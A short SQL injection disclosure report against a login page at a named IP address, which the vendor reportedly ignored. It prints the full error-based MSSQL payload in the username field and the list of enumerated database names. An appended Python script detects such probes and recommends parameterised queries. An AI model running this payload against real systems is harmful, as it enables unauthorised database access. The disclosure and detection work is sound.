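2014-11-05: Details reported to the vendor; awaiting vendor handling
2014-11-10: The vendor has chosen to ignore the vulnerability; details disclosed to the public
SQL injection. Could I get an invitation code?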
http://59.77.139.100/defaultnew.aspx (POST)
__VIEWSTATE=/wEPDwUKMTcwNzMxMzk2Mw8WAh4IU29mdENvZGUFLDNNWC80bnBRZ2pGL1UvSE53OFlNQ3FJemZMR0RJNzdQWVFCYzBCNFlhcVE9FgICAw9kFgYCAw9kFgICAg8QZGQWAWZkAgUPZBYCAgIPEGRkFgFmZAIHDw8WAh4HVmlzaWJsZWdkFgRmDw8WAh4ISW1hZ2VVcmwFI3RoZW1lL3RoZW1lMy9zdHlsZTEvV2FsbHBhcGVyLzUuanBnZGQCBg8PFgIfAWhkZGQafWJOgbVj8/bFRppkHmz/l3E8vQ%3D%3D&txtUserName3=asd&txtPassword3=asd&ddlUserType3=1&btnLogin=%B5%C7 %C2%BC
Place: POST
Parameter: txtUserName3
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKMTcwNzMxMzk2Mw8WAh4IU29mdENvZGUFLDNNWC80bnBRZ2pGL1UvSE53OFlNQ3FJemZMR0RJNzdQWVFCYzBCNFlhcVE9FgICAw9kFgYCAw9kFgICAg8QZGQWAWZkAgUPZBYCAgIPEGRkFgFmZAIHDw8WAh4HVmlzaWJsZWdkFgRmDw8WAh4ISW1hZ2VVcmwFI3RoZW1lL3RoZW1lMy9zdHlsZTEvV2FsbHBhcGVyLzUuanBnZGQCBg8PFgIfAWhkZGQafWJOgbVj8/bFRppkHmz/l3E8vQ==&txtUserName3=asd' AND 3285=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHAR(109)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3285=3285) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113))) AND 'shHP'='shHP&txtPassword3=asd&ddlUserType3=1&btnLogin=%B5%C7 %C2%BC
available databases [7]:
[*] LMS_FJGCXY
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Didn't dump the tables; too slow.
Filtering
Severity: no impact (ignored by vendor)
Ignored on: 2014-11-10 12:16
None yet
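A detection-side reading of the sqlmap payload in this report, as an added example that is not part of the original report or of any vendor code: it parses a form-encoded login body and flags fields carrying the `CONVERT(INT,(SELECT ...))` conversion-error pattern and `CHAR(n)+CHAR(n)` marker strings. The function names are hypothetical and the `__VIEWSTATE` value in the sample is a placeholder.

```python
import re
from urllib.parse import parse_qsl, urlencode

# CONVERT(INT,(SELECT ...)) forces a conversion error whose message echoes
# the subquery's string result back to the client.
CONVERSION = re.compile(r"\bCONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I)
# Strings spelled as CHAR(n)+CHAR(n)+... so no quoted literal is needed.
CHAR_RUN = re.compile(
    r"CHAR\s*\(\s*\d{1,3}\s*\)(?:\s*\+\s*CHAR\s*\(\s*\d{1,3}\s*\))+", re.I)
CHAR_ARG = re.compile(r"\(\s*(\d{1,3})\s*\)")


def decode_char_runs(value):
    """Return the strings spelled out by CHAR(n)+CHAR(n)+... runs."""
    return ["".join(chr(int(n)) for n in CHAR_ARG.findall(m.group(0)))
            for m in CHAR_RUN.finditer(value)]


def scan_form_body(body):
    """Return one finding per form field that looks like an error-based probe."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        reasons = []
        if CONVERSION.search(value):
            reasons.append("int-conversion of subquery")
        markers = decode_char_runs(value)
        if markers:
            reasons.append("CHAR() concatenation")
        if reasons:
            findings.append({"field": name, "reasons": reasons, "markers": markers})
    return findings


# Constructed sample: field names and the injected value are those shown in
# the report; the __VIEWSTATE value is a placeholder, not the real one.
PROBE = ("asd' AND 3285=CONVERT(INT,(SELECT CHAR(113)+CHAR(121)+CHAR(109)+CHAR(107)"
         "+CHAR(113)+(SELECT (CASE WHEN (3285=3285) THEN CHAR(49) ELSE CHAR(48) END))"
         "+CHAR(113)+CHAR(120)+CHAR(100)+CHAR(98)+CHAR(113))) AND 'shHP'='shHP")


def sample_body(username):
    """Encode a login form as it would appear on the wire ('+' sent as %2B)."""
    return urlencode({"__VIEWSTATE": "PLACEHOLDER", "txtUserName3": username,
                      "txtPassword3": "asd", "ddlUserType3": "1"})


if __name__ == "__main__":
    for label, user in (("benign", "asd"), ("probe", PROBE)):
        print(label, scan_form_body(sample_body(user)))
```

Matching of this kind is for log triage and alerting only. The application-side fix is to bind `txtUserName3` as a query parameter instead of building the SQL string from it.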